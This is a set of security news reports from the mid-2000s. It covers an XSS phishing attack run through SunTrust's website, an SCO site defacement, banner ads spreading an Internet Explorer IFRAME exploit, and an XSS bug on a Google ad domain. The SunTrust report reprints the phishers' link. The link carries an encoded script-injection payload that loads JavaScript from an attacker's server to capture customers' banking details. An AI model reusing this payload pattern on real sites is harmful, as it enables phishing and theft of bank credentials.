A facility in SunTrust Bank's www.suntrust.com web site is allowing fraudsters to inject their own code into the site to obtain SunTrust customer account authentication details, and at least one fraudster has exploited this error by sending large numbers of electronic mails purporting to be from SunTrust, asking the user to confirm their bank account on his form, executed from SunTrust's web site.

This makes the fraud much more convincing than traditional phishing mails, as the url the SunTrust customer clicks on actually runs from the SunTrust site before loading JavaScript from the fraudsters server, located in Korea.

The JavaScript then changes the title of the page to "Suntrust Online Banking - Account Verification" and sets the window status to "Suntrust Online Banking", thereby preventing suspicious URLs from being displayed when the victim hovers their mouse cursor over a hyperlink. An 'iframe' is used to insert a form onto the page, which asks the customer to enter their Social Security number and SunTrust banking details. When the form is submitted, it is processed by a PHP script, allowing the attacker to capture the account details.

The phishing emails received by Netcraft contain the following HTML to create a hyperlink to the SunTrust web site:

<a
href="http://www.suntrust.com/onlinestatements/index.asp?AccountVerify=df4g6
53432fvfdsGFSg45wgSVFwfvfVDFS54v54g5F42f543ff5445wv54w&promo=%22%3E%3Cscript
+language%3Djavascript+src%3D%22http%3A%2F%2F%3211%2E1%375%2E176%2E179%2Fsun
%2Fsun%2Ejs%22%3E%3C%2FSCRIPT%3E)http://www.suntrust.com/onlinestatements/in
dex.asp?AccountVerify=df4g653432fvfdsGFSg45wgSVFwfvfVDFS54v54g5F42f543ff5445
wv54w&promo=%22%3E%3Cscript+language%3Djavascript+src%3D%22http%3A%2F%2F%321
1%2E1%375%2E176%2E179%2Fsun%2Fsun%2Ejs%22%3E%3C%2FSCRIPT%3E"
target="_blank">click here.</td></tr></table></a>

One of the parameters supplied to the page is not properly encoded when the SunTrust site displays it, which allows an attacker to inject arbitrary HTML, including JavaScript which is executed by customers' web browsers. The highlighted portion of the URL, which unneccessarily appears twice, causes the following script to be inserted into the page:

<script language=javascript src="http://211.175.176.179/sun/sun.js">
</SCRIPT>

This in turn executes the JavaScript which is responsible for altering the contents of the page.

Fraudsters have noticed opportunities in SunTrust's internet banking operations previously, and a similar attack was executed in September.

Careless application errors and inadequate testing are believed to be an industry wide problem for internet banking, and even though it would seem to the man in the street appalling that someone could run a fraud from a bank's own site, SunTrust competitors are unlikely to be strongly critical through fear of similar problems with their own facilities.

Netcraft has highlighted the threat of cross site scripting and script injection used for fraud, and provides a range of services for banks and other financial institutions to try and eliminate these kinds of errors from their systems, including comprehensive application testing and training for developers and designers of web based applications.

SCO's web site now proudly proclaims "We own all your code" and "pay us all your money".

Some people might claim that this just represents a simplification in SCO's stance on Unix intellectual property but a closer look reveals that the prominent image on their home page was the work of an attacker.

In addition to the two comments made by the image, a woman is also depicted writing "Hacked by realloc()", which corresponds to the same person responsible for an attack on the site yesterday.

The same image also appears on SCO's backup site, thescogroup.com. It is not yet known whether this attack is related to the recent web site outages experienced on the site.

Technology news site The Register today identified its ad serving provider, Falk AG, as the source of banner ads which spread an IFRAME exploit via its web site for more than six hours Saturday. The Register apologized to its readers and recommended that they check their machines for infections.

Reports Saturday noted that the exploit appeared on numerous European sites, but it appears U.S sites may have been affected as well. An analysis of the exploit by LURHQ noted that "one of the hacked sites included a well-known Hollywood film studio's website." Falk AG's client list includes numerous entertainment properties, including NBC/Universal, The Golf Channel, The A&E Network and Sony Pictures Digital. The Dutch news site Nu.nl has also acknowledged hosting the banner exploits.

The Register said it is pursuing details of the event from Falk, which is expected to have public comment about the incident Monday. The LURHQ analysis said some versions of the complex exploit installed adware onto users' computers, while other versions downloaded remote-access trojan.

(more...)

Banner ads appearing on popular European web sites have been directing traffic to sites that install malware on visitors' computers, according to the Internet Storm Center. The attacks are exploiting an unpatched flaw in the way Internet Explorer 6 handles the IFRAME tag.

"Some high profile sites with banner ads are linking to servers that have the exploit and malicious code," according to an advisory on the ISC web site. The attack is an expanded version of banner-based exploits that first surfaced earlier this year. Banner networks, with their ability to place code on hundreds of outside sites, offer a vehicle for the rapid distribution of trojans and other malware, as well as a way to deface web pages. It is not clear whether the malicious code was being spread through a compromised ad server, or through specific banners submitted to ad networks.

(more...)

A young Italian computer scientist has discovered another phishing opportunity on one of Google's web sites. This bug affects the googlesyndication.com domain, which Google use to serve their text and image based adverts.

The discovery comes only days after a similar bug was found with the Google Desktop search tool. As Google spread their technology over a greater number of application areas, the possibility for error increases; which could explain the recent stream of discoveries as they fall victim to public scrutiny.

The latest cross site scripting opportunity exploits a flaw in the User Feedback section of Google's advertising system. This allows an attacker to inject their own content onto the page, which could lead to fraudulent activity or phishing. An attacker can exploit this vulnerability to affect any browser which has JavaScript enabled, including Microsoft Internet Explorer and Mozilla Firefox.

Salvatore Aranzulla's web site contains information about his discovery of the bug (Italian). He also demonstrates some URLs that can be used to exploit the bug.